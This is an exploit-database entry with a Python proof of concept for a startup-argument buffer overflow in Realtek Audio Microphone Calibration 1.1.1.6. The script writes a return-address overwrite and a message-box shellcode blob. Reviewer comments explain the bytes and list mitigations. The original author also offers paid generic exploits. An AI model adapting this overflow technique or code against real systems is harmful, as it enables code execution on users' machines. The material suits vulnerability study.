ID SSV:70223 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long argument
# as a startup parameter. Shellcode can be run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)
# Ps. If you need generic exploit ...
# (no hardcoded VA's), write it yourself ;) or 'donate few' $$$
# we will c0de it for You ^^
#
# Reviewer summary
# ----------------
# Python 2 script (the final line is a print statement) that only writes a
# 396-byte proof-of-concept blob to disk: 340 filler bytes, a 4-byte
# return-address overwrite, 16 bytes of marker/padding, 26 bytes of code and
# 10 trailing int 3 bytes. It does not start the target application; how the
# blob reaches the startup parameter is not shown here.
#
# Portability: the overwrite value and the operands of both call instructions
# are fixed values, which the author's "no hardcoded VA's" remark acknowledges.
# The PoC is therefore tied to the tested system (Windows XP SP3 Home Edition).
#
# Defensive reading: per the author's description the root cause is an
# over-long startup argument copied into a fixed-size buffer, so the real fix is
# length-checked argument handling in the application. Stack cookies (/GS),
# SafeSEH, DEP and ASLR are the generic mitigations for this bug class.
# Process-creation logging that records command lines can surface abnormally
# long arguments -- NOTE(review): confirm which telemetry is available.
filepath = "C:\\ShellCode\\MicCal 1.1.1.6 - Exploit.bin"
# Opened in binary mode so the byte values below are written unmodified.
# NOTE(review): no try/finally or with-block; an exception in any write would
# leave the handle open until interpreter exit.
f = open(filepath, "wb")
# dummy data
# 340 bytes of 0x90 (x86 NOP); presumably the distance from the start of the
# buffer to the saved return address on the tested build -- not derivable here.
f.write('\x90' * 340)
# overwrite ret
# Fixed 4-byte value written byte-for-byte; its meaning depends on the memory
# layout of the tested system and is not explained by the author.
f.write('\xD7\x30\x9D\x7C')
# 8-byte author tag followed by 8 bytes of 'A' padding ahead of the code.
f.write("[BraniX]")
f.write('A' * 8)
# start shellcode
# Demonstration payload only: by the author's own annotations it shows a
# message box and then exits the process.
f.write('\x83\xEC\x08') # sub esp,8
f.write('\x88\x04\x24') # mov byte ptr [esp], al
f.write('\x83\xEC\x08') # sub esp,8
f.write('\x54') # push esp
f.write('\x5B') # pop ebx
f.write('\x50') # push eax
f.write('\x53') # push ebx
f.write('\x53') # push ebx
f.write('\x50') # push eax
# Opcode E8 is a relative call, so the target named in the author's comment is
# only reached when the code sits at the address the author assumed.
f.write('\xE8\x35\x08\x27\x7E') # call user32.MessageBoxA
f.write('\x57') # push edi
f.write('\xE8\x57\xCB\x6E\x7C') # call kernel32.ExitProcess
# Breakpoint padding: execution that runs past the payload traps instead of
# continuing into arbitrary memory.
f.write('\xCC' * 10) # int 3's
f.close()
print "Done ..."
{"lastseen": "2017-11-19T17:04:07", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-70223", "references": [], "enchantments_done": [], "id": "SSV:70223", "title": "Realtek Audio Microphone Calibration 1.1.1.6 Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n # done by BraniX <branix@hackers.org.pl>\r\n# www.hackers.org.pl\r\n# found: 2010.08.24\r\n# tested on: Windows XP SP3 Home Edition\r\n\r\n# App. has classic buffer overflow vulnerability\r\n# it can be triggered by passing too long argument \r\n# as a startup parameter. Shellcode can by run via classic\r\n# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)\r\n\r\n# Ps. 
If you need generic exploit ...\r\n# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ \r\n# we will c0de it for You ^^\r\n\r\nfilepath = "C:\\\\ShellCode\\\\MicCal 1.1.1.6 - Exploit.bin"\r\nf = open(filepath, "wb")\r\n\r\n# dummy data\r\nf.write('\\x90' * 340)\r\n\r\n# overwrite ret\r\nf.write('\\xD7\\x30\\x9D\\x7C')\r\nf.write("[BraniX]")\r\nf.write('A' * 8)\r\n\r\n# start shellcode\r\nf.write('\\x83\\xEC\\x08') # sub esp,8\r\nf.write('\\x88\\x04\\x24') # mov byte ptr [esp], al\r\nf.write('\\x83\\xEC\\x08') # sub esp,8\r\n\r\nf.write('\\x54') # push esp\r\nf.write('\\x5B') # pop ebx\r\n\r\nf.write('\\x50') # push eax\r\nf.write('\\x53') # push ebx\r\nf.write('\\x53') # push ebx\r\nf.write('\\x50') # push eax\r\n\r\nf.write('\\xE8\\x35\\x08\\x27\\x7E') # call user32.MessageBoxA\r\nf.write('\\x57') # push edi\r\n\r\nf.write('\\xE8\\x57\\xCB\\x6E\\x7C') # call kernel32.ExitProcess\r\n\r\nf.write('\\xCC' * 10) # int 3's\r\n\r\nf.close()\r\n\r\nprint "Done ..."\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70223", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645364449}}